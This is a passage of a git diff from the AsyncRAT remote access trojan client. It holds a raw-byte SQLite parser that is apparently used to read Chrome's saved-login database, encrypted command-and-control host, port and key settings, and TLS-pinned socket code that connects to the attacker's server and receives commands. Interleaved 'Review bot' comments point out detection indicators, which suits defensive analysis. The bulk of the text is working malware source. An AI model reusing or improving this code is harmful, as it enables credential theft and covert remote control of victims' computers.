= false; + if ((num4 == 0) | (num4 > 9)) + { + return 0L; + } + if (num4 == 1) + { + buffer[0] = (byte)(this.db_bytes[startIndex] & 0x7f); + return BitConverter.ToInt64(buffer, 0); + } + if (num4 == 9) + { + flag = true; + } + int num2 = 1; + int num3 = 7; + int index = 0; + if (flag) + { + buffer[0] = this.db_bytes[endIndex - 1]; + endIndex--; + index = 1; + } + int num7 = startIndex; + for (int i = endIndex - 1; i >= num7; i += -1) + { + if ((i - 1) >= startIndex) + { + buffer[index] = (byte)((((byte)(this.db_bytes[i] >> ((num2 - 1) & 7))) & (((int)0xff) >> num2)) | ((byte)(this.db_bytes[i - 1] << (num3 & 7)))); + num2++; + index++; + num3--; + } + else if (!flag) + { + buffer[index] = (byte)(((byte)(this.db_bytes[i] >> ((num2 - 1) & 7))) & (((int)0xff) >> num2)); + } + } + return BitConverter.ToInt64(buffer, 0); + } + + public int GetRowCount() + { + return this.table_entries.Length; + } + + public string[] GetTableNames() + { + string[] strArray2 = null; + int index = 0; + int num3 = this.master_table_entries.Length - 1; + for (int i = 0; i <= num3; i++) + { + if (this.master_table_entries[i].item_type == "table") + { + strArray2 = (string[])Utils.CopyArray((Array)strArray2, new string[index + 1]); + strArray2[index] = this.master_table_entries[i].item_name; + index++; + } + } + return strArray2; + } + + public string GetValue(int row_num, int field) + { + if (row_num >= this.table_entries.Length) + { + return null; + } + if (field >= this.table_entries[row_num].content.Length) + { + return null; + } + return this.table_entries[row_num].content[field]; + } + + public string GetValue(int row_num, string field) + { + int num = -1; + int length = this.field_names.Length - 1; + for (int i = 0; i <= length; i++) + { + if (this.field_names[i].ToLower().CompareTo(field.ToLower()) == 0) + { + num = i; + break; + } + } + if (num == -1) + { + return null; + } + return this.GetValue(row_num, num); + } + + private int GVL(int startIndex) + { + if (startIndex > 
this.db_bytes.Length) + { + return 0; + } + int num3 = startIndex + 8; + for (int i = startIndex; i <= num3; i++) + { + if (i > (this.db_bytes.Length - 1)) + { + return 0; + } + if ((this.db_bytes[i] & 0x80) != 0x80) + { + return i; + } + } + return (startIndex + 8); + } + + private bool IsOdd(long value) + { + return ((value & 1L) == 1L); + } + + private void ReadMasterTable(ulong Offset) + { + if (this.db_bytes[(int)Offset] == 13) + { + ushort num2 = Convert.ToUInt16(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)), decimal.One)); + int length = 0; + if (this.master_table_entries != null) + { + length = this.master_table_entries.Length; + this.master_table_entries = (sqlite_master_entry[])Utils.CopyArray((Array)this.master_table_entries, new sqlite_master_entry[(this.master_table_entries.Length + num2) + 1]); + } + else + { + this.master_table_entries = new sqlite_master_entry[num2 + 1]; + } + int num13 = num2; + for (int i = 0; i <= num13; i++) + { + ulong num = this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 8M), new decimal(i * 2))), 2); + if (decimal.Compare(new decimal(Offset), 100M) != 0) + { + num += Offset; + } + int endIndex = this.GVL((int)num); + long num7 = this.CVL((int)num, endIndex); + int num6 = this.GVL(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One))); + this.master_table_entries[length + i].row_id = this.CVL(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One)), num6); + num = Convert.ToUInt64(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(num6), new decimal(num))), decimal.One)); + endIndex = this.GVL((int)num); + num6 = endIndex; + long num5 = this.CVL((int)num, endIndex); + long[] numArray = new long[5]; + int index = 0; + do + { + endIndex = num6 + 1; + num6 = 
this.GVL(endIndex); + numArray[index] = this.CVL(endIndex, num6); + if (numArray[index] > 9L) + { + if (this.IsOdd(numArray[index])) + { + numArray[index] = (long)Math.Round((double)(((double)(numArray[index] - 13L)) / 2.0)); + } + else + { + numArray[index] = (long)Math.Round((double)(((double)(numArray[index] - 12L)) / 2.0)); + } + } + else + { + numArray[index] = this.SQLDataTypeSize[(int)numArray[index]]; + } + index++; + } + while (index <= 4); + if (decimal.Compare(new decimal(this.encoding), decimal.One) == 0) + { + this.master_table_entries[length + i].item_type = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int)numArray[0]); + } + else if (decimal.Compare(new decimal(this.encoding), 2M) == 0) + { + this.master_table_entries[length + i].item_type = Encoding.Unicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int)numArray[0]); + } + else if (decimal.Compare(new decimal(this.encoding), 3M) == 0) + { + this.master_table_entries[length + i].item_type = Encoding.BigEndianUnicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int)numArray[0]); + } + if (decimal.Compare(new decimal(this.encoding), decimal.One) == 0) + { + this.master_table_entries[length + i].item_name = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0]))), (int)numArray[1]); + } + else if (decimal.Compare(new decimal(this.encoding), 2M) == 0) + { + this.master_table_entries[length + i].item_name = Encoding.Unicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0]))), (int)numArray[1]); + } + else if (decimal.Compare(new decimal(this.encoding), 3M) == 0) + { + this.master_table_entries[length + i].item_name = Encoding.BigEndianUnicode.GetString(this.db_bytes, 
Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0]))), (int)numArray[1]); + } + this.master_table_entries[length + i].root_num = (long)this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0])), new decimal(numArray[1])), new decimal(numArray[2]))), (int)numArray[3]); + if (decimal.Compare(new decimal(this.encoding), decimal.One) == 0) + { + this.master_table_entries[length + i].sql_statement = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0])), new decimal(numArray[1])), new decimal(numArray[2])), new decimal(numArray[3]))), (int)numArray[4]); + } + else if (decimal.Compare(new decimal(this.encoding), 2M) == 0) + { + this.master_table_entries[length + i].sql_statement = Encoding.Unicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0])), new decimal(numArray[1])), new decimal(numArray[2])), new decimal(numArray[3]))), (int)numArray[4]); + } + else if (decimal.Compare(new decimal(this.encoding), 3M) == 0) + { + this.master_table_entries[length + i].sql_statement = Encoding.BigEndianUnicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0])), new decimal(numArray[1])), new decimal(numArray[2])), new decimal(numArray[3]))), (int)numArray[4]); + } + } + } + else if (this.db_bytes[(int)Offset] == 5) + { + ushort num11 = Convert.ToUInt16(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)), decimal.One)); + int num14 = num11; + for (int j = 0; j <= num14; j++) + { + ushort startIndex = 
(ushort)this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 12M), new decimal(j * 2))), 2); + if (decimal.Compare(new decimal(Offset), 100M) == 0) + { + this.ReadMasterTable(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger(startIndex, 4)), decimal.One), new decimal(this.page_size)))); + } + else + { + this.ReadMasterTable(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger((int)(Offset + startIndex), 4)), decimal.One), new decimal(this.page_size)))); + } + } + this.ReadMasterTable(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 8M)), 4)), decimal.One), new decimal(this.page_size)))); + } + } + + public bool ReadTable(string TableName) + { + int index = -1; + int length = this.master_table_entries.Length - 1; + for (int i = 0; i <= length; i++) + { + if (this.master_table_entries[i].item_name.ToLower().CompareTo(TableName.ToLower()) == 0) + { + index = i; + break; + } + } + if (index == -1) + { + return false; + } + string[] strArray = this.master_table_entries[index].sql_statement.Substring(this.master_table_entries[index].sql_statement.IndexOf("(") + 1).Split(new char[] { ',' }); + int num6 = strArray.Length - 1; + for (int j = 0; j <= num6; j++) + { + strArray[j] = (strArray[j]).TrimStart(); + int num4 = strArray[j].IndexOf(" "); + if (num4 > 0) + { + strArray[j] = strArray[j].Substring(0, num4); + } + if (strArray[j].IndexOf("UNIQUE") == 0) + { + break; + } + this.field_names = (string[])Utils.CopyArray((Array)this.field_names, new string[j + 1]); + this.field_names[j] = strArray[j]; + } + return this.ReadTableFromOffset((ulong)((this.master_table_entries[index].root_num - 1L) * this.page_size)); + } + + private bool ReadTableFromOffset(ulong Offset) + { + if (this.db_bytes[(int)Offset] == 13) + { + int num2 = Convert.ToInt32(decimal.Subtract(new 
decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)), decimal.One)); + int length = 0; + if (this.table_entries != null) + { + length = this.table_entries.Length; + this.table_entries = (table_entry[])Utils.CopyArray((Array)this.table_entries, new table_entry[(this.table_entries.Length + num2) + 1]); + } + else + { + this.table_entries = new table_entry[num2 + 1]; + } + int num16 = num2; + for (int i = 0; i <= num16; i++) + { + record_header_field[] _fieldArray = null; + ulong num = this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 8M), new decimal(i * 2))), 2); + if (decimal.Compare(new decimal(Offset), 100M) != 0) + { + num += Offset; + } + int endIndex = this.GVL((int)num); + long num9 = this.CVL((int)num, endIndex); + int num8 = this.GVL(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One))); + this.table_entries[length + i].row_id = this.CVL(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One)), num8); + num = Convert.ToUInt64(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(num8), new decimal(num))), decimal.One)); + endIndex = this.GVL((int)num); + num8 = endIndex; + long num7 = this.CVL((int)num, endIndex); + long num10 = Convert.ToInt64(decimal.Add(decimal.Subtract(new decimal(num), new decimal(endIndex)), decimal.One)); + for (int j = 0; num10 < num7; j++) + { + _fieldArray = (record_header_field[])Utils.CopyArray((Array)_fieldArray, new record_header_field[j + 1]); + endIndex = num8 + 1; + num8 = this.GVL(endIndex); + _fieldArray[j].type = this.CVL(endIndex, num8); + if (_fieldArray[j].type > 9L) + { + if (this.IsOdd(_fieldArray[j].type)) + { + _fieldArray[j].size = (long)Math.Round((double)(((double)(_fieldArray[j].type - 13L)) / 2.0)); + } + else + { + _fieldArray[j].size = 
(long)Math.Round((double)(((double)(_fieldArray[j].type - 12L)) / 2.0)); + } + } + else + { + _fieldArray[j].size = this.SQLDataTypeSize[(int)_fieldArray[j].type]; + } + num10 = (num10 + (num8 - endIndex)) + 1L; + } + this.table_entries[length + i].content = new string[(_fieldArray.Length - 1) + 1]; + int num4 = 0; + int num17 = _fieldArray.Length - 1; + for (int k = 0; k <= num17; k++) + { + if (_fieldArray[k].type > 9L) + { + if (!this.IsOdd(_fieldArray[k].type)) + { + if (decimal.Compare(new decimal(this.encoding), decimal.One) == 0) + { + this.table_entries[length + i].content[k] = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)), new decimal(num4))), (int)_fieldArray[k].size); + } + else if (decimal.Compare(new decimal(this.encoding), 2M) == 0) + { + this.table_entries[length + i].content[k] = Encoding.Unicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)), new decimal(num4))), (int)_fieldArray[k].size); + } + else if (decimal.Compare(new decimal(this.encoding), 3M) == 0) + { + this.table_entries[length + i].content[k] = Encoding.BigEndianUnicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)), new decimal(num4))), (int)_fieldArray[k].size); + } + } + else + { + this.table_entries[length + i].content[k] = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)), new decimal(num4))), (int)_fieldArray[k].size); + } + } + else + { + this.table_entries[length + i].content[k] = Conversions.ToString(this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)), new decimal(num4))), (int)_fieldArray[k].size)); + } + num4 += (int)_fieldArray[k].size; + } + } + } + else if (this.db_bytes[(int)Offset] == 5) + { + ushort num14 = Convert.ToUInt16(decimal.Subtract(new 
decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)), decimal.One)); + int num18 = num14; + for (int m = 0; m <= num18; m++) + { + ushort num13 = (ushort)this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 12M), new decimal(m * 2))), 2); + this.ReadTableFromOffset(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger((int)(Offset + num13), 4)), decimal.One), new decimal(this.page_size)))); + } + this.ReadTableFromOffset(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 8M)), 4)), decimal.One), new decimal(this.page_size)))); + } + return true; + } + + [StructLayout(LayoutKind.Sequential)] + private struct record_header_field + { + public long size; + public long type; + } + + [StructLayout(LayoutKind.Sequential)] + private struct sqlite_master_entry + { + public long row_id; + public string item_type; + public string item_name; + public string astable_name; + public long root_num; + public string sql_statement; + } + + [StructLayout(LayoutKind.Sequential)] + private struct table_entry + { + public long row_id; + public string[] content; + } + } +} diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs index 6cdf390..5238476 100644 --- a/AsyncRAT-C#/Client/Settings.cs +++ b/AsyncRAT-C#/Client/Settings.cs 
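Review bot: `SQLiteHandler` has no comment saying what it is for or where it came from, and the numbered locals (`num2`, `num13`, `numArray`) suggest decompiled or machine-translated code, so its origin should be recorded at the top of the class. A header such as `// Reads a SQLite 3 file from raw bytes via Microsoft.VisualBasic.FileSystem; no SQLite library is loaded` would state what the constructor visibly does. For anyone triaging a host, that means there is no SQLite module load to look for. The observable event is a shared read (`OpenAccess.Read`, `OpenShare.Shared`) of the `Login Data` path that `recoverChrome` in Recovery.cs passes in, performed by a process that is not the browser.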
@@ -1,23 +1,38 @@ using Client.Cryptography; using System; using System.IO; +using System.Security.Cryptography; +using System.Security.Cryptography.X509Certificates; using System.Text; namespace Client { public static class Settings { +#if DEBUG public static string Ports = "6606"; - public static string Host = "127.0.0.1"; + public static string Hosts = "127.0.0.1"; public static string Version = "AsyncRAT 0.4.7"; public static string Install = "false"; public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe"); - public static string Password = "NYAN CAT"; + public static string Key = "NYAN CAT"; public static string MTX = "%MTX%"; -#if DEBUG + public static string Certificate = "%Certificate%"; + public static string Serversignature = "%Serversignature%"; + public static X509Certificate2 ServerCertificate; public static string Anti = "false"; - public static Aes256 aes256 = new Aes256(Password); + public static Aes256 aes256 = new Aes256(Key); #else + public static string Ports = "%Ports%"; + public static string Hosts = "%Hosts%"; + public static string Version = "AsyncRAT 0.4.8"; + public static string Install = "%Install%"; + public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%Folder%"), "%File%"); + public static string Key = "%Key%"; + public static string MTX = "%MTX%"; + public static string Certificate = "%Certificate%"; + public static string Serversignature = "%Serversignature%"; + public static X509Certificate2 ServerCertificate; public static readonly string Anti = "%Anti%"; public static Aes256 aes256; #endif 
@@ -30,13 +45,28 @@ namespace Client #endif try { - Password = Encoding.UTF8.GetString(Convert.FromBase64String(Password)); - aes256 = new Aes256(Password); + Key = Encoding.UTF8.GetString(Convert.FromBase64String(Key)); + aes256 = new Aes256(Key); Ports = aes256.Decrypt(Ports); - Host = aes256.Decrypt(Host); - return true; + Hosts = aes256.Decrypt(Hosts); + Serversignature = aes256.Decrypt(Serversignature); + ServerCertificate = new X509Certificate2(Convert.FromBase64String(aes256.Decrypt(Certificate))); + return VerifyHash(); } catch { return false; } } + + private static bool VerifyHash() + { + try + { + var csp = (RSACryptoServiceProvider)ServerCertificate.PublicKey.Key; + return csp.VerifyHash(Sha256.ComputeHash(Encoding.UTF8.GetBytes(Key)), CryptoConfig.MapNameToOID("SHA256"), Convert.FromBase64String(Serversignature)); + } + catch (Exception) + { + return false; + } + } } } \ No newline at end of file diff --git a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs index c25afc8..9944d2c 100644 --- a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs +++ b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs @@ -9,6 +9,9 @@ using System.Net.Sockets; using System.Threading; using System.Text; using System.Security.Principal; +using System.Net.Security; +using System.Security.Authentication; +using System.Security.Cryptography.X509Certificates; // │ Author : NYAN CAT // │ Name : Nyan Socket v0.1 @@ -18,9 +21,10 @@ using System.Security.Principal; namespace Client.Sockets { - public static class ClientSocket + public static class ClientSocket { public static Socket Client { get; set; } + public static SslStream SslClient { get; set; } private static byte[] Buffer { get; set; } private static long Buffersize { get; set; } private static Timer Tick { get; set; } 
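Review bot: The new `VerifyHash` and the changed body of `InitializeSettings` carry no comment on what is being verified, and both end in a catch that only returns `false`, so a malformed value and a signature mismatch look the same to the caller. A comment above `VerifyHash` should say that `Sha256.ComputeHash` of the decoded `Key` is checked against `Serversignature` with the RSA public key of the embedded `ServerCertificate`. It is also worth recording next to `Key` that, as far as this hunk shows, it is only base64-encoded in the same assembly and is the value that decrypts `Ports`, `Hosts`, `Certificate` and `Serversignature`. That means a sample's full configuration can be recovered statically. `InitializeSettings` begins above this hunk.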
@@ -39,15 +43,20 @@ namespace Client.Sockets ReceiveBufferSize = 50 * 1024, SendBufferSize = 50 * 1024, }; - Client.Connect(Convert.ToString(Settings.Host.Split(',')[new Random().Next(Settings.Host.Split(',').Length)]), + Client.Connect(Convert.ToString(Settings.Hosts.Split(',')[new Random().Next(Settings.Hosts.Split(',').Length)]), Convert.ToInt32(Settings.Ports.Split(',')[new Random().Next(Settings.Ports.Split(',').Length)])); - Debug.WriteLine("Connected!"); - IsConnected = true; - Buffer = new byte[4]; - MS = new MemoryStream(); - Send(SendInfo()); - Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000)); - Client.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, ReadServertData, null); + if (Client.Connected) + { + Debug.WriteLine("Connected!"); + IsConnected = true; + SslClient = new SslStream(new NetworkStream(Client, true), false, ValidateServerCertificate); + SslClient.AuthenticateAsClient(Client.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false); + Buffer = new byte[4]; + MS = new MemoryStream(); + Send(SendInfo()); + Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000)); + SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); + } } catch { @@ -56,12 +65,21 @@ namespace Client.Sockets } } + private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) + { +#if DEBUG + return true; +#endif + return Settings.ServerCertificate.Equals(certificate); + } + public static void Reconnect() { try { Tick?.Dispose(); + SslClient?.Dispose(); Client?.Dispose(); MS?.Dispose(); } 
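Review bot: The `AuthenticateAsClient` call is uncommented although its arguments fix the wire behaviour: `SslProtocols.Tls` limits the handshake to TLS 1.0, the target host is the text of `Client.RemoteEndPoint` cut at the first `:` (the peer address, not a host name), and the final `false` turns revocation checking off. A comment such as `// TLS 1.0 only; target host is the peer address; no revocation check` would record that. For network monitoring this gives a TLS 1.0 client handshake to the configured port, which is worth alerting on where TLS 1.0 is otherwise retired. The enclosing method begins above the hunk.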
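Review bot: `ValidateServerCertificate` never reads `chain` or `sslPolicyErrors` and decides solely on `Settings.ServerCertificate.Equals(certificate)`, and in a DEBUG build the `return true;` accepts any certificate and leaves the final `return` unreachable; none of this is commented. The method should carry a comment like `// pin: accept only the embedded certificate; chain and policy errors are not consulted`, and the preprocessor block reads more clearly with `#else` before the pinned return. Because trust does not depend on the chain, the peer can presumably present a self-signed certificate, so chain or issuer reputation will not separate this traffic. The embedded certificate, recoverable from a sample's settings, is the indicator to pivot on.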
@@ -81,7 +99,7 @@ namespace Client.Sockets Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit"); msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName; msgpack.ForcePathObject("Version").AsString = Settings.Version; - msgpack.ForcePathObject("Admin").AsString = new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator).ToString().ToLower().Replace("true", "Administrator").Replace("false","User"); + msgpack.ForcePathObject("Admin").AsString = new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator).ToString().ToLower().Replace("true", "Administrator").Replace("false", "User"); TheCPUCounter.NextValue(); msgpack.ForcePathObject("Performance").AsString = $"CPU {(int)TheCPUCounter.NextValue()}% RAM {(int)TheMemCounter.NextValue()}%"; return msgpack.Encode2Bytes(); 
@@ -96,40 +114,42 @@ namespace Client.Sockets IsConnected = false; return; } - - int recevied = Client.EndReceive(ar); - if (recevied == 4) + int recevied = SslClient.EndRead(ar); + if (recevied > 0) { MS.Write(Buffer, 0, recevied); - Buffersize = BitConverter.ToInt32(MS.ToArray(), 0); - Debug.WriteLine("/// Client Buffersize " + Buffersize.ToString() + " Bytes ///"); - MS.Dispose(); - MS = new MemoryStream(); - if (Buffersize > 0) + if (MS.Length == 4) { - Buffer = new byte[Buffersize]; - while (MS.Length != Buffersize) + Buffersize = BitConverter.ToInt32(MS.ToArray(), 0); + Debug.WriteLine("/// Client Buffersize " + Buffersize.ToString() + " Bytes ///"); + MS.Dispose(); + MS = new MemoryStream(); + if (Buffersize > 0) { - int rc = Client.Receive(Buffer, 0, Buffer.Length, SocketFlags.None); - if (rc == 0) + Buffer = new byte[Buffersize]; + while (MS.Length != Buffersize) { - IsConnected = false; - return; + int rc = SslClient.Read(Buffer, 0, Buffer.Length); + if (rc == 0) + { + IsConnected = false; + return; + } + MS.Write(Buffer, 0, rc); + Buffer = new byte[Buffersize - MS.Length]; } - MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; + if (MS.Length == Buffersize) + { + ThreadPool.QueueUserWorkItem(Packet.Read, MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); + } + else + Buffer = new byte[Buffersize - MS.Length]; } - if (MS.Length == Buffersize) - { - ThreadPool.QueueUserWorkItem(Packet.Read, MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); - } - else - Buffer = new byte[Buffersize - MS.Length]; } - Client.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, ReadServertData, null); + SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); } else { 
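Review bot: The framing this hunk reads is not described anywhere. It is a 4-byte length from `BitConverter.ToInt32`, then that many bytes collected with blocking `SslClient.Read` calls inside the `BeginRead` callback and handed to `Packet.Read` on the thread pool. A comment at the top of `ReadServertData` should state that layout and note that `Buffersize` comes from the peer and is checked only with `> 0` before `new byte[Buffersize]`. The next hunk drops `Settings.aes256.Encrypt` from `Send`, so at least outbound frames are plain message bytes inside TLS, and a decoder for captured sessions has to model that. The method begins above the hunk and continues below it.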
@@ -158,12 +178,13 @@ namespace Client.Sockets if (msg == null) return; - byte[] buffer = Settings.aes256.Encrypt(msg); + byte[] buffer = msg; byte[] buffersize = BitConverter.GetBytes(buffer.Length); Client.Poll(-1, SelectMode.SelectWrite); - Client.Send(buffersize, 0, buffersize.Length, SocketFlags.None); - Client.Send(buffer, 0, buffer.Length, SocketFlags.None); + SslClient.Write(buffersize, 0, buffersize.Length); + SslClient.Write(buffer, 0, buffer.Length); + SslClient.Flush(); } catch {